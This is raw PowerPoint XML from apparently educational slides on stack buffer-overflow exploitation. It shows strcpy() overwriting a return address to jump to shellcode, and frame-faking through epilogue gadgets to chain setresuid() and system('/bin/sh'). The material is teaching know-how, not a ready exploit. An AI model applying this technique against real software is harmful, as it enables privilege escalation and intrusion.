            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="384" y="240"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="768" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="768" h="240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="120"/>
                  <a:pt x="256" y="240"/>
                  <a:pt x="384" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="240"/>
                  <a:pt x="640" y="120"/>
                  <a:pt x="768" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="med" len="me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6312" name="Freeform 40"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="5200650"/>
            <a:ext cx="1219200" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="384" y="240"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="768" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="768" h="240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="120"/>
                  <a:pt x="256" y="240"/>
                  <a:pt x="384" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="240"/>
                  <a:pt x="640" y="120"/>
                  <a:pt x="768" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="med" len="me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6313" name="Freeform 41"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="5200650"/>
            <a:ext cx="1219200" cy="285750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="384" y="240"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="768" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="768" h="240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="120"/>
                  <a:pt x="256" y="240"/>
                  <a:pt x="384" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="240"/>
                  <a:pt x="640" y="120"/>
                  <a:pt x="768" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206314" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="5486401"/>
            <a:ext cx="663964" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206315" name="Text Box 43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505202" y="5543551"/>
            <a:ext cx="1522725" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>original function’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206316" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019801" y="5543551"/>
            <a:ext cx="2163926" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> jumps to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206317" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1212850" y="4485086"/>
            <a:ext cx="184666" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171507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63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63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06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62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62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62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062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62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062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62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062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62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062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063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063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0629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0629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062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0629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0629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629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0630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063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063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063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063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06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283" grpId="0" animBg="1"/>
      <p:bldP spid="1206284" grpId="0" animBg="1"/>
      <p:bldP spid="1206285" grpId="0" animBg="1"/>
      <p:bldP spid="1206286" grpId="0" animBg="1"/>
      <p:bldP spid="1206287" grpId="0" animBg="1"/>
      <p:bldP spid="1206288" grpId="0" animBg="1"/>
      <p:bldP spid="1206289" grpId="0" animBg="1"/>
      <p:bldP spid="1206290" grpId="0" animBg="1"/>
      <p:bldP spid="1206291" grpId="0" animBg="1"/>
      <p:bldP spid="1206292" grpId="0" animBg="1"/>
      <p:bldP spid="1206293" grpId="0" animBg="1"/>
      <p:bldP spid="1206294" grpId="0" animBg="1"/>
      <p:bldP spid="1206295" grpId="0" animBg="1"/>
      <p:bldP spid="1206296" grpId="0" animBg="1"/>
      <p:bldP spid="1206297" grpId="0" animBg="1"/>
      <p:bldP spid="1206298" grpId="0" animBg="1"/>
      <p:bldP spid="1206299" grpId="0" animBg="1"/>
      <p:bldP spid="1206300" grpId="0" animBg="1"/>
      <p:bldP spid="1206301" grpId="0" animBg="1"/>
      <p:bldP spid="1206309" grpId="0" animBg="1"/>
      <p:bldP spid="1206310" grpId="0"/>
      <p:bldP spid="1206311" grpId="0" animBg="1"/>
      <p:bldP spid="1206312" grpId="0" animBg="1"/>
      <p:bldP spid="1206313" grpId="0" animBg="1"/>
      <p:bldP spid="1206314" grpId="0"/>
      <p:bldP spid="1206315" grpId="0"/>
      <p:bldP spid="1206316" grpId="0"/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Executing Arbitrary Sequences of Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207299" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function chaining is limited by the size and number of parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the fake </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>return address the address of a function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>epilogue, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>it is possible to induce the application to adjust the stack before each execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The initial overflow sets up a number of fake function frames that contain fake saved frame pointers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53435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7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7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7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7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72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7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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="44577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saved ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209349" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="41719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saved eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209350" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="4743450"/>
            <a:ext cx="1905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buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209352" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="304800" y="3028950"/>
            <a:ext cx="0" cy="11430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353" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2209800" y="3028950"/>
            <a:ext cx="0" cy="11430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354" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2209800" y="47434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355" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="304800" y="47434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362" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2209800" y="51435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363" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="304800" y="51435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383" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1212850" y="4366023"/>
            <a:ext cx="184666" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209384" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="44577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pointer to fake1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209385" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="41719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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209386" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="4743450"/>
            <a:ext cx="1905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buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209389" name="Line 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4343400" y="47434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390" name="Line 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="47434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391" name="Line 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4343400" y="51435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392" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="51435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393" name="Rectangle 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3346450" y="4366023"/>
            <a:ext cx="184666" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209394" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="38862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fake1 (ptr to fake2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209395" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="36004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setresuid()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209396" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="33147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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209397" name="Rectangle 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="30289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ruid (param 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209398" name="Rectangle 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="27432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euid (param 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209399" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="24574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suid (param 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209401" name="Rectangle 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="21717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fake2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209402" name="Rectangle 58"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="18859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system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209403" name="Rectangle 59"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="16002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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209407" name="Rectangle 63"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="13144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“/bin/sh0”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209408" name="Line 64"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="10287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409" name="Line 65"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
